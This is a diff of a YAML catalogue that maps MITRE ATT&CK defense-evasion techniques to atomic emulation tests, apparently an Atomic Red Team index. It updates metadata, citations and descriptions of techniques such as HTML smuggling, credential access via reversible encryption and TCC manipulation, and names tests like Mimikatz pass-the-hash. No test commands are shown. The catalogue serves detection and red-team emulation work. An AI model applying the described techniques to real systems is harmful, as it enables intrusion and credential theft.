+      - source_name: AWS CloudTrail Search
+        description: Amazon. (n.d.). Search CloudTrail logs for API calls to EC2 Instances.
+          Retrieved June 17, 2020.
+        url: https://aws.amazon.com/premiumsupport/knowledge-center/cloudtrail-search-api-calls/
+      - source_name: Cloud Audit Logs
+        description: Google. (n.d.). Audit Logs. Retrieved June 1, 2020.
+        url: https://cloud.google.com/logging/docs/audit#admin-activity
+      - source_name: Mandiant M-Trends 2020
+        description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
+          2020.
+        url: https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf
+      - source_name: Azure Activity Logs
+        description: Microsoft. (n.d.). View Azure activity logs. Retrieved June 17,
+          2020.
+        url: https://docs.microsoft.com/en-us/azure/azure-resource-manager/management/view-activity-logs
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1055.009:
     technique:
@@ -22517,7 +22772,7 @@ defense-evasion:
         url: http://man7.org/linux/man-pages/man1/dd.1.html
         description: Kerrisk, M. (2020, February 2). DD(1) User Commands. Retrieved
           February 21, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-06-20T22:25:55.331Z'
       name: Proc Memory
       description: "Adversaries may inject malicious code into processes via the /proc
         filesystem in order to evade process-based defenses as well as possibly elevate
@@ -22560,8 +22815,6 @@ defense-evasion:
       x_mitre_defense_bypassed:
       - Application control
       - Anti-virus
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1601.001:
     technique:
@@ -22608,7 +22861,7 @@ defense-evasion:
         url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#13
         description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco
           IOS Run-Time Memory Integrity Verification. Retrieved October 19, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-10-22T17:50:46.560Z'
       name: Patch System Image
       description: "Adversaries may modify the operating system of a network device
         to introduce new capabilities or weaken existing defenses.(Citation: Killing
@@ -22674,12 +22927,10 @@ defense-evasion:
       - 'File: File Modification'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1070.009:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-11T22:30:01.227Z'
       name: Clear Persistence
       description: |-
         Adversaries may clear artifacts associated with previously established persistence on a host system to remove evidence of their activity. This may involve various actions, such as removing services, deleting executables, [Modify Registry](https://attack.mitre.org/techniques/T1112), [Plist File Modification](https://attack.mitre.org/techniques/T1647), or other methods of cleanup to prevent defenders from collecting evidence of their persistent presence.(Citation: Cylance Dust Storm) Adversaries may also delete accounts previously created to maintain persistence (i.e. [Create Account](https://attack.mitre.org/techniques/T1136)).(Citation: Talos - Cisco Attack 2022)
@@ -22734,33 +22985,84 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
-  T1556.001:
-    technique:
-      x_mitre_platforms:
-      - Windows
+  T1036.010:
+    technique:
+      modified: '2024-10-17T15:20:36.705Z'
+      name: Masquerade Account Name
+      description: "Adversaries may match or approximate the names of legitimate accounts
+        to make newly created ones appear benign. This will typically occur during
+        [Create Account](https://attack.mitre.org/techniques/T1136), although accounts
+        may also be renamed at a later date. This may also coincide with [Account
+        Access Removal](https://attack.mitre.org/techniques/T1531) if the actor first
+        deletes an account before re-creating one with the same name.(Citation: Huntress
+        MOVEit 2023)\n\nOften, adversaries will attempt to masquerade as service accounts,
+        such as those associated with legitimate software, data backups, or container
+        cluster management.(Citation: Elastic CUBA Ransomware 2022)(Citation: Aquasec
+        Kubernetes Attack 2023) They may also give accounts generic, trustworthy names,
+        such as “admin”, “help”, or “root.”(Citation: Invictus IR Cloud Ransomware
+        2024) Sometimes adversaries may model account names off of those already existing
+        in the system, as a follow-on behavior to [Account Discovery](https://attack.mitre.org/techniques/T1087).
+        \ \n\nNote that this is distinct from [Impersonation](https://attack.mitre.org/techniques/T1656),
+        which describes impersonating specific trusted individuals or organizations,
+        rather than user or service account names.  "
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: defense-evasion
+      x_mitre_contributors:
+      - Menachem Goldstein
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
       x_mitre_domains:
       - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--d4b96d2c-1032-4b22-9235-2b5b649d0605
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
+      - SaaS
+      - IaaS
+      - Containers
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'User Account: User Account Creation'
       type: attack-pattern
-      created: '2020-02-11T19:05:02.399Z'
+      id: attack-pattern--d349c66e-18e1-4d8b-a2d7-65af7cbd2ba0
+      created: '2024-08-05T21:39:16.274Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1556.001
-        url: https://attack.mitre.org/techniques/T1556/001
-      - source_name: Dell Skeleton
-        description: Dell SecureWorks. (2015, January 12). Skeleton Key Malware Analysis.
-          Retrieved April 8, 2019.
-        url: https://www.secureworks.com/research/skeleton-key-malware-analysis
-      - url: https://technet.microsoft.com/en-us/library/dn487457.aspx
-        description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved
-          June 3, 2016.
-        source_name: TechNet Audit Policy
-      modified: '2022-04-25T14:00:00.188Z'
+        url: https://attack.mitre.org/techniques/T1036/010
+        external_id: T1036.010
+      - source_name: Elastic CUBA Ransomware 2022
+        description: Daniel Stepanic, Derek Ditch, Seth Goodwin, Salim Bitam, Andrew
+          Pease. (2022, September 7). CUBA Ransomware Campaign Analysis. Retrieved
+          August 5, 2024.
+        url: https://www.elastic.co/security-labs/cuba-ransomware-campaign-analysis
+      - source_name: Invictus IR Cloud Ransomware 2024
+        description: Invictus IR. (2024, January 11). Ransomware in the cloud. Retrieved
+          August 5, 2024.
+        url: https://www.invictus-ir.com/news/ransomware-in-the-cloud
+      - source_name: Huntress MOVEit 2023
+        description: John Hammond. (2023, June 1). MOVEit Transfer Critical Vulnerability
+          CVE-2023-34362 Rapid Response. Retrieved August 5, 2024.
+        url: https://www.huntress.com/blog/moveit-transfer-critical-vulnerability-rapid-response
+      - source_name: Aquasec Kubernetes Attack 2023
+        description: Michael Katchinskiy, Assaf Morag. (2023, April 21). First-Ever
+          Attack Leveraging Kubernetes RBAC to Backdoor Clusters. Retrieved July 14,
+          2023.
+        url: https://blog.aquasec.com/leveraging-kubernetes-rbac-to-backdoor-clusters
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
+  T1556.001:
+    technique:
+      modified: '2024-08-21T15:26:54.386Z'
       name: Domain Controller Authentication
       description: "Adversaries may patch the authentication process on a domain controller
         to bypass the typical authentication mechanisms and enable access to accounts.
@@ -22781,6 +23083,7 @@ defense-evasion:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_deprecated: false
       x_mitre_detection: "Monitor for calls to <code>OpenProcess</code> that can be
         used to manipulate lsass.exe running on a domain controller as well as for
         malicious modifications to functions exported from authentication-related
@@ -22795,22 +23098,42 @@ defense-evasion:
         used to execute binaries on a remote system as a particular account. Correlate
         other security systems with login information (e.g. a user has an active login
         session but has not entered the building or does not have VPN access). "
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '2.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '2.1'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'Process: Process Access'
       - 'File: File Modification'
       - 'Process: OS API Execution'
-      x_mitre_permissions_required:
-      - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--d4b96d2c-1032-4b22-9235-2b5b649d0605
+      created: '2020-02-11T19:05:02.399Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1556/001
+        external_id: T1556.001
+      - source_name: Dell Skeleton
+        description: Dell SecureWorks. (2015, January 12). Skeleton Key Malware Analysis.
+          Retrieved April 8, 2019.
+        url: https://www.secureworks.com/research/skeleton-key-malware-analysis
+      - source_name: TechNet Audit Policy
+        description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved
+          June 3, 2016.
+        url: https://technet.microsoft.com/en-us/library/dn487457.aspx
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1027.006:
     technique:
-      modified: '2023-07-14T14:01:41.475Z'
+      modified: '2024-09-12T19:12:13.006Z'
       name: HTML Smuggling
       description: |-
         Adversaries may smuggle data and files past content filters by hiding malicious payloads inside of seemingly benign HTML files. HTML documents can store large binary objects known as JavaScript Blobs (immutable data that represents raw bytes) that can later be constructed into file-like objects. Data may also be stored in Data URLs, which enable embedding media type or MIME files inline of HTML documents. HTML5 also introduced a download attribute that may be used to initiate file downloads.(Citation: HTML Smuggling Menlo Security 2020)(Citation: Outlflank HTML Smuggling 2018)
@@ -22868,13 +23191,12 @@ defense-evasion:
         url: https://www.menlosecurity.com/blog/new-attack-alert-duri
       - source_name: nccgroup Smuggling HTA 2017
         description: Warren, R. (2017, August 8). Smuggling HTA files in Internet
-          Explorer/Edge. Retrieved May 20, 2021.
-        url: https://research.nccgroup.com/2017/08/08/smuggling-hta-files-in-internet-explorer-edge/
+          Explorer/Edge. Retrieved September 12, 2024.
+        url: https://www.nccgroup.com/us/research-blog/smuggling-hta-files-in-internet-exploreredge/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1027.006
     atomic_tests:
     - name: HTML Smuggling Remote Payload
@@ -22905,37 +23227,7 @@ defense-evasion:
         elevation_required: false
   T1556.005:
     technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--d50955c2-272d-4ac8-95da-10c29dda1c48
-      type: attack-pattern
-      created: '2022-01-13T20:02:28.349Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1556.005
-        url: https://attack.mitre.org/techniques/T1556/005
-      - source_name: store_pwd_rev_enc
-        url: https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/store-passwords-using-reversible-encryption
-        description: Microsoft. (2021, October 28). Store passwords using reversible
-          encryption. Retrieved January 3, 2022.
-      - source_name: how_pwd_rev_enc_1
-        url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible.html
-        description: 'Teusink, N. (2009, August 25). Passwords stored using reversible
-          encryption: how it works (part 1). Retrieved November 17, 2021.'
-      - source_name: how_pwd_rev_enc_2
-        url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible_26.html
-        description: 'Teusink, N. (2009, August 26). Passwords stored using reversible
-          encryption: how it works (part 2). Retrieved November 17, 2021.'
-      - source_name: dump_pwd_dcsync
-        url: https://adsecurity.org/?p=2053
-        description: Metcalf, S. (2015, November 22). Dump Clear-Text Passwords for
-          All Admins in the Domain Using Mimikatz DCSync. Retrieved November 15, 2021.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-08-26T15:40:31.871Z'
       name: Reversible Encryption
       description: |-
         An adversary may abuse Active Directory authentication encryption properties to gain access to credentials on Windows systems. The <code>AllowReversiblePasswordEncryption</code> property specifies whether reversible password encryption for an account is enabled or disabled. By default this property is disabled (instead storing user credentials as the output of one-way hashing functions) and should not be enabled unless legacy or other software require it.(Citation: store_pwd_rev_enc)
@@ -22957,6 +23249,7 @@ defense-evasion:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_deprecated: false
       x_mitre_detection: "Monitor property changes in Group Policy: <code>Computer
         Configuration\\Windows Settings\\Security Settings\\Account Policies\\Password
         Policy\\Store passwords using reversible encryption</code>. By default, the
@@ -22967,23 +23260,50 @@ defense-evasion:
         Directory PowerShell modules, such as <code>Set-ADUser</code> and <code>Set-ADAccountControl</code>,
         that change account configurations. \n\nMonitor Fine-Grained Password Policies
         and regularly audit user accounts and group settings.(Citation: dump_pwd_dcsync)"
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Active Directory: Active Directory Object Modification'
       - 'Command: Command Execution'
       - 'User Account: User Account Metadata'
       - 'Script: Script Execution'
-      x_mitre_permissions_required:
-      - User
-      - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--d50955c2-272d-4ac8-95da-10c29dda1c48
+      created: '2022-01-13T20:02:28.349Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1556/005
+        external_id: T1556.005
+      - source_name: dump_pwd_dcsync
+        description: Metcalf, S. (2015, November 22). Dump Clear-Text Passwords for
+          All Admins in the Domain Using Mimikatz DCSync. Retrieved November 15, 2021.
+        url: https://adsecurity.org/?p=2053
+      - source_name: store_pwd_rev_enc
+        description: Microsoft. (2021, October 28). Store passwords using reversible
+          encryption. Retrieved January 3, 2022.
+        url: https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/store-passwords-using-reversible-encryption
+      - source_name: how_pwd_rev_enc_1
+        description: 'Teusink, N. (2009, August 25). Passwords stored using reversible
+          encryption: how it works (part 1). Retrieved November 17, 2021.'
+        url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible.html
+      - source_name: how_pwd_rev_enc_2
+        description: 'Teusink, N. (2009, August 26). Passwords stored using reversible
+          encryption: how it works (part 2). Retrieved November 17, 2021.'
+        url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible_26.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1027.010:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-09-12T19:43:18.873Z'
       name: Command Obfuscation
       description: |-
         Adversaries may obfuscate content during command execution to impede detection. Command-line obfuscation is a method of making strings and patterns within commands and scripts more difficult to signature and analyze. This type of obfuscation can be included within commands executed by delivered payloads (e.g., [Phishing](https://attack.mitre.org/techniques/T1566) and [Drive-by Compromise](https://attack.mitre.org/techniques/T1189)) or interactively via [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059).(Citation: Akamai JS)(Citation: Malware Monday VBE)
@@ -23024,8 +23344,9 @@ defense-evasion:
         url: https://attack.mitre.org/techniques/T1027/010
         external_id: T1027.010
       - source_name: Twitter Richard WMIC
-        description: Ackroyd, R. (2023, March 24). Twitter. Retrieved March 24, 2023.
-        url: https://twitter.com/rfackroyd/status/1639136000755765254
+        description: Ackroyd, R. (2023, March 24). Twitter. Retrieved September 12,
+          2024.
+        url: https://x.com/rfackroyd/status/1639136000755765254
       - source_name: Invoke-Obfuscation
         description: Bohannon, D. (2016, September 24). Invoke-Obfuscation. Retrieved
           March 17, 2023.
@@ -23061,43 +23382,23 @@ defense-evasion:
         url: https://redcanary.com/threat-detection-report/techniques/powershell/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1070.004:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Walker Johnson
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      type: attack-pattern
-      id: attack-pattern--d63a3fb8-9452-4e9d-a60a-54be68d5998c
-      created: '2020-01-31T12:35:36.479Z'
-      x_mitre_version: '1.1'
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1070.004
-        url: https://attack.mitre.org/techniques/T1070/004
-      - source_name: Microsoft SDelete July 2016
-        url: https://docs.microsoft.com/en-us/sysinternals/downloads/sdelete
-        description: Russinovich, M. (2016, July 4). SDelete v2.0. Retrieved February
-          8, 2018.
-      x_mitre_deprecated: false
-      revoked: false
+      modified: '2024-10-15T16:33:59.107Z'
+      name: 'Indicator Removal on Host: File Deletion'
       description: |-
         Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105)) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
 
         There are tools available from the host operating system to perform cleanup, but adversaries may use other tools as well.(Citation: Microsoft SDelete July 2016) Examples of built-in [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) functions include <code>del</code> on Windows and <code>rm</code> or <code>unlink</code> on Linux and macOS.
-      modified: '2022-05-11T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: 'Indicator Removal on Host: File Deletion'
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: defense-evasion
+      x_mitre_contributors:
+      - Walker Johnson
+      x_mitre_deprecated: false
       x_mitre_detection: It may be uncommon for events related to benign command-line
         functions such as DEL or third-party utilities or tools to be found in an
         environment, depending on the user base and how systems are typically used.
@@ -23108,18 +23409,36 @@ defense-evasion:
         network that an adversary could introduce. Some monitoring tools may collect
         command-line arguments, but may not capture DEL commands since DEL is a native
         function within cmd.exe.
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: defense-evasion
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'File: File Deletion'
       x_mitre_defense_bypassed:
       - Host forensic analysis
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--d63a3fb8-9452-4e9d-a60a-54be68d5998c
+      created: '2020-01-31T12:35:36.479Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1070/004
+        external_id: T1070.004
+      - source_name: Microsoft SDelete July 2016
+        description: Russinovich, M. (2016, July 4). SDelete v2.0. Retrieved February
+          8, 2018.
+        url: https://docs.microsoft.com/en-us/sysinternals/downloads/sdelete
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1070.004
     atomic_tests:
     - name: Delete a single file - Windows cmd
@@ -23353,7 +23672,7 @@ defense-evasion:
         description: Hanson, R. (2016, September 24). phishery. Retrieved July 21,
           2018.
         source_name: ryhanson phishery SEPT 2016
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-01-12T18:16:56.176Z'
       name: Template Injection
       description: |-
         Adversaries may create or modify references in user document templates to conceal malicious code or force authentication attempts. For example, Microsoft’s Office Open XML (OOXML) specification defines an XML-based format for Office documents (.docx, xlsx, .pptx) to replace older binary formats (.doc, .xls, .ppt). OOXML files are packed together ZIP archives compromised of various XML files, referred to as parts, containing properties that collectively define how a document is rendered.(Citation: Microsoft Open XML July 2017)
@@ -23383,8 +23702,6 @@ defense-evasion:
       x_mitre_permissions_required:
       - User
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1221
     atomic_tests:
     - name: WINWORD Remote Template Injection
@@ -23409,7 +23726,7 @@ defense-evasion:
         name: command_prompt
   T1134:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:47.762Z'
       name: Access Token Manipulation
       description: |-
         Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
@@ -23506,7 +23823,6 @@ defense-evasion:
         url: https://pentestlab.blog/2017/04/03/token-manipulation/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
     atomic_tests: []
   T1027.002:
     technique:
@@ -23569,7 +23885,6 @@ defense-evasion:
         url: https://www.welivesecurity.com/wp-content/uploads/2018/01/WP-FinFisher.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
       identifier: T1027.002
     atomic_tests: []
   T1564.005:
@@ -23607,7 +23922,7 @@ defense-evasion:
         description: 'Kaspersky Lab''s Global Research and Analysis Team. (2015, February).
           Equation Group: Questions and Answers. Retrieved December 21, 2015.'
         url: https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08064459/Equation_group_questions_and_answers.pdf
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-06-29T15:12:11.024Z'
       name: Hidden File System
       description: |-
         Adversaries may use a hidden file system to conceal malicious activity from users and security tools. File systems provide a structure to store and access data from physical storage. Typically, a user engages with a file system through applications that allow them to access files and directories, which are an abstraction from their physical location (ex: disk sector). Standard file systems include FAT, NTFS, ext4, and APFS. File systems can also contain other structures, such as the Volume Boot Record (VBR) and Master File Table (MFT) in NTFS.(Citation: MalwareTech VFS Nov 2014)
@@ -23634,8 +23949,6 @@ defense-evasion:
       x_mitre_permissions_required:
       - User
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1055.005:
     technique:
@@ -23663,7 +23976,7 @@ defense-evasion:
           A Technical Survey Of Common And Trending Process Injection Techniques.
           Retrieved December 7, 2017.'
         source_name: Elastic Process Injection July 2017
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-18T12:24:54.198Z'
       name: Thread Local Storage
       description: "Adversaries may inject malicious code into processes via thread
         local storage (TLS) callbacks in order to evade process-based defenses as
@@ -23707,8 +24020,6 @@ defense-evasion:
       x_mitre_defense_bypassed:
       - Anti-virus
       - Application control
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1622:
     technique:
@@ -23763,7 +24074,7 @@ defense-evasion:
         Specific checks will vary based on the target and/or adversary, but may involve [Native API](https://attack.mitre.org/techniques/T1106) function calls such as <code>IsDebuggerPresent()</code> and <code> NtQueryInformationProcess()</code>, or manually checking the <code>BeingDebugged</code> flag of the Process Environment Block (PEB). Other checks for debugging artifacts may also seek to enumerate hardware breakpoints, interrupt assembly opcodes, time checks, or measurements if exceptions are raised in the current process (assuming a present debugger would “swallow” or handle the potential error).(Citation: hasherezade debug)(Citation: AlKhaser Debug)(Citation: vxunderground debug)
 
         Adversaries may use the information learned from these debugger checks during automated discovery to shape follow-on behaviors. Debuggers can also be evaded by detaching the process or flooding debug logs with meaningless data via messages produced by looping [Native API](https://attack.mitre.org/techniques/T1106) function calls such as <code>OutputDebugStringW()</code>.(Citation: wardle evilquest partii)(Citation: Checkpoint Dridex Jan 2021)
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-16T15:05:55.918Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Debugger Evasion
       x_mitre_detection: |-
@@ -23783,7 +24094,6 @@ defense-evasion:
       - 'Command: Command Execution'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1622
     atomic_tests:
     - name: Detect a Debugger Presence in the Machine
@@ -23845,7 +24155,6 @@ defense-evasion:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
       identifier: T1036.006
     atomic_tests: []
   T1550.002:
@@ -23900,7 +24209,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1550.002
     atomic_tests:
     - name: Mimikatz Pass the Hash
@@ -24025,7 +24333,7 @@ defense-evasion:
         name: powershell
   T1574.002:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:47.241Z'
       name: 'Hijack Execution Flow: DLL Side-Loading'
       description: |-
         Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
@@ -24075,7 +24383,6 @@ defense-evasion:
         url: https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-dll-sideloading.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
       identifier: T1574.002
     atomic_tests:
     - name: DLL Side-Loading using the Notepad++ GUP.exe binary
@@ -24194,7 +24501,7 @@ defense-evasion:
         elevation_required: true
   T1216.002:
     technique:
-      modified: '2024-04-18T23:51:40.464Z'
+      modified: '2024-09-12T19:42:21.547Z'
       name: SyncAppvPublishingServer
       description: "Adversaries may abuse SyncAppvPublishingServer.vbs to proxy execution
         of malicious [PowerShell](https://attack.mitre.org/techniques/T1059/001) commands.
@@ -24254,8 +24561,8 @@ defense-evasion:
       - source_name: 7 - appv
         description: Nick Landers. (2017, August 8). Need a signed alternative to
           Powershell.exe? SyncAppvPublishingServer in Win10 has got you covered..
-          Retrieved February 6, 2024.
-        url: https://twitter.com/monoxgas/status/895045566090010624
+          Retrieved September 12, 2024.
+        url: https://x.com/monoxgas/status/895045566090010624
       - source_name: 3 - appv
         description: 'Raj Chandel. (2022, March 17). Indirect Command Execution: Defense
           Evasion (T1202). Retrieved February 6, 2024.'
@@ -24272,37 +24579,18 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1548.006:
     technique:
-      modified: '2024-04-17T00:02:12.021Z'
+      modified: '2024-10-16T16:54:56.714Z'
       name: TCC Manipulation
-      description: "Adversaries can manipulate or abuse the Transparency, Consent,
-        & Control (TCC) service or database to execute malicious applications with
-        elevated permissions. TCC is a Privacy & Security macOS control mechanism
-        used to determine if the running process has permission to access the data
-        or services protected by TCC, such as screen sharing, camera, microphone,
-        or Full Disk Access (FDA).\n\nWhen an application requests to access data
-        or a service protected by TCC, the TCC daemon (`tccd`) checks the TCC database,
-        located at `/Library/Application Support/com.apple.TCC/TCC.db` (and `~/` equivalent),
-        for existing permissions. If permissions do not exist, then the user is prompted
-        to grant permission. Once permissions are granted, the database stores the
-        application's permissions and will not prompt the user again unless reset.
-        For example, when a web browser requests permissions to the user's webcam,
-        once granted the web browser may not explicitly prompt the user again.(Citation:
-        welivesecurity TCC)\n\nAdversaries may manipulate the TCC database or otherwise
-        abuse the TCC service to execute malicious content. This can be done in various
-        ways, including using privileged system applications to execute malicious
-        payloads or manipulating the database to grant their application TCC permissions.
-        \n\nFor example, adversaries can use Finder, which has FDA permissions by
-        default, to execute malicious [AppleScript](https://attack.mitre.org/techniques/T1059/002)
